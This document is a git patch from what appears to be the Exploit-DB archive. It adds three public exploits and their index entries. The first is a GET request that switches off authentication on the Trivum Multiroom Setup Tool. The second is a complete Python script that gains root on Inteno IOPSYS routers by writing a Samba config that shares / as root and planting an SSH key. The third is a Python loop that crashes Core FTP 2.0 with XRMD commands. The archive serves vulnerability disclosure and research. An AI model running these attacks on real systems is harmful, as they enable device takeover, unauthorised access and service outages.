From cfbfaba0a7532082314b7e676baca9da24ceb991 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 27 Jul 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-07-27
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

3 changes to exploits/shellcodes

Core FTP 2.0 - 'XRMD' Denial of Service (PoC)

Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation

Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
---
 exploits/hardware/webapps/45088.txt |  19 ++++++
 exploits/linux/local/45089.py       | 101 ++++++++++++++++++++++++++++
 exploits/windows/dos/45091.py       |  63 +++++++++++++++++
 files_exploits.csv                  |   3 +
 4 files changed, 186 insertions(+)
 create mode 100644 exploits/hardware/webapps/45088.txt
 create mode 100755 exploits/linux/local/45089.py
 create mode 100755 exploits/windows/dos/45091.py

diff --git a/exploits/hardware/webapps/45088.txt b/exploits/hardware/webapps/45088.txt
new file mode 100644
index 000000000..e47792271
--- /dev/null
+++ b/exploits/hardware/webapps/45088.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
+# Date: 2018-07-25
+# Software Link: [https://world.trivum-shop.de](https://world.trivum-shop.de/)
+# https://world.trivum-shop.de/# Version: < 9.34 build 13381 - 12.07.18
+# Category: hardware, webapps
+# Tested on: V8.76 - SNR 8604.26 - C4 Professional
+# Exploit Author: vulnc0d3c
+# CVE: CVE-2018-13859
+
+# 1. Description
+# MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18,
+# allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request
+# to the end-point "?id=0&attr=protectAccess&newValue=0"
+# (successful attack will allow attackers to login without authorization).
+
+# 2. Proof of Concept
+# GET Request
+
+http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
\ No newline at end of file
diff --git a/exploits/linux/local/45089.py b/exploits/linux/local/45089.py
new file mode 100755
index 000000000..b58c0dd24
--- /dev/null
+++ b/exploits/linux/local/45089.py
@@ -0,0 +1,101 @@
+#!/usr/bin/python
+
+import json
+import sys
+import subprocess
+import socket
+import os
+from websocket import create_connection
+
+def ubusAuth(host, username, password):
+    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
+    req = json.dumps({"jsonrpc":"2.0","method":"call",
+        "params":["00000000000000000000000000000000","session","login",
+        {"username": username,"password":password}],
+        "id":666})
+    ws.send(req)
+    response =  json.loads(ws.recv())
+    ws.close()
+    try:
+        key = response.get('result')[1].get('ubus_rpc_session')
+    except IndexError:
+        return(None)
+    return(key)
+
+def ubusCall(host, key, namespace, argument, params={}):
+    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
+    req = json.dumps({"jsonrpc":"2.0","method":"call",
+        "params":[key,namespace,argument,params],
+        "id":666})
+    ws.send(req)
+    response =  json.loads(ws.recv())
+    ws.close()
+    try:
+        result = response.get('result')[1]
+    except IndexError:
+        if response.get('result')[0] == 0:
+            return(True)
+        return(None)
+    return(result)
+
+if __name__ == "__main__":
+    host = "192.168.1.1"
+    sshkey = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ=="
+    user = "user"
+    pasw = "user"
+    conf = """[global]
+	netbios name = IntenoSMB 
+	workgroup = IntenoSMB
+	server string = IntenoSMB
+	syslog = 10
+	encrypt passwords = true
+	passdb backend = smbpasswd
+	obey pam restrictions = yes
+	socket options = TCP_NODELAY
+	unix charset = UTF-8
+	preferred master = yes
+	os level = 20
+	security = user
+	guest account = root
+	smb passwd file = /etc/samba/smbpasswd
+	interfaces = 192.168.1.1/24 br-lan 
+	bind interfaces only = yes
+	wide links = no
+
+[pwn]
+	path = /
+	read only = no
+	guest ok = yes
+	create mask = 0700
+	directory mask = 0700
+	force user = root
+"""
+
+    print("Authenticating...")
+    key = ubusAuth(host, user, pasw)
+    if (not key):
+        print("Auth failed!")
+        sys.exit(1)
+    print("Got key: %s" % key)
+
+    print("Dropping evil Samba config...")
+    ltc = ubusCall(host, key, "file", "write_tmp",
+        {"path":"/tmp/etc/smb.conf", "data": conf})
+    if (not ltc):
+        print("Failed to write evil config!")
+        sys.exit(1)
+
+    print("Creating temp file for key...")
+    with open(".key.tmp","a+") as file:
+        file.write(sshkey)
+        path = os.path.realpath(file.name)
+
+    print("Dropping key...")
+    subprocess.run("smbclient {0}pwn -U% -c 'put {1} /etc/dropbear/authorized_keys'".format(r"\\\\" + host + r"\\", path),
+        shell=True, check=True)
+    print("Key dropped")
+
+    print("Cleaning up...")
+    os.remove(path)
+
+    print("Exploitation complete. Try \"ssh root@%s\"" % host)
\ No newline at end of file
diff --git a/exploits/windows/dos/45091.py b/exploits/windows/dos/45091.py
new file mode 100755
index 000000000..a1cba5d44
--- /dev/null
+++ b/exploits/windows/dos/45091.py
@@ -0,0 +1,63 @@
+# Exploit Title: Core FTP 2.0 - 'XRMD' Denial of Service (PoC)
+# Date: 2018-07-24
+# Exploit Author: Erik David Martin
+# Vendor Homepage: http://www.coreftp.com/
+# Software Link: http://www.coreftp.com/server/download/CoreFTPServer.exe
+# Version: Version 2.0, build 653, 32-bit
+# Tested on: Windows XP Professional, Version 2002, Service Pack 3
+# CVE: N/A
+
+# Proof of concept:
+# Create a new domain and set IP address
+# Use the default certificate by Core FTP Server
+# Set base directory
+# Create an anonymous user (anonymous:anonymous) for example
+# Set a path for the user
+# Start the server
+# Run exploit: python exploit.py *target ip* anonymous anonymous
+# Watch the server crash...
+# The exploit will work for any user, and not just anonymous
+
+import sys
+import socket
+
+try:
+	host = sys.argv[1]
+	username = sys.argv[2]
+	password = sys.argv[3]
+except:
+	print("Usage: exploit.py *target ip* *username* *password*")
+	sys.exit()
+
+mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #
+mysocket.settimeout(2)
+
+try:
+	mysocket.connect((host,21))
+	mysocket.recv(1024)
+	print("\n[+] Connected\n")
+except:
+	print("[-] Error! Could not connect to target")
+	sys.exit()
+
+junk = ("asO8M.lFX[Gq<4<p(.P5eMLv]\2!G8jB_6Gx[I;I!aYa#oAi@kI<f.QFwkSBiQ,!")
+
+try:
+	mysocket.send("USER " + username + "\r\n")
+	mysocket.recv(1024)
+	mysocket.send("PASS " + password + "\r\n")
+	mysocket.recv(1024)
+	print("[+] Logged in as " + username)
+except:
+	print("[-] Error! Could not log in as " + username)
+	sys.exit()
+
+print("[+] Sending malicious request")
+
+while True:
+	try:
+		mysocket.send("XRMD " + junk + "\r\n")
+		mysocket.recv(1024)
+	except:
+		print("[+] Target is down\n")
+		sys.exit()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 14e23e315..5011b032a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6026,6 +6026,7 @@ id,file,description,date,author,type,platform,port
 45082,exploits/linux/dos/45082.txt,"Nagios Core 4.4.1 - Denial of Service",2018-07-24,"Fakhri Zulkifli",dos,linux,
 45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows,
 45087,exploits/windows/dos/45087.py,"GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC)",2018-07-25,"Nathu Nandwani",dos,windows,
+45091,exploits/windows/dos/45091.py,"Core FTP 2.0 - 'XRMD' Denial of Service (PoC)",2018-07-26,"Erik David Martin",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9830,6 +9831,7 @@ id,file,description,date,author,type,platform,port
 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
+45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39705,3 +39707,4 @@ id,file,description,date,author,type,platform,port
 45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
 45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
+45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,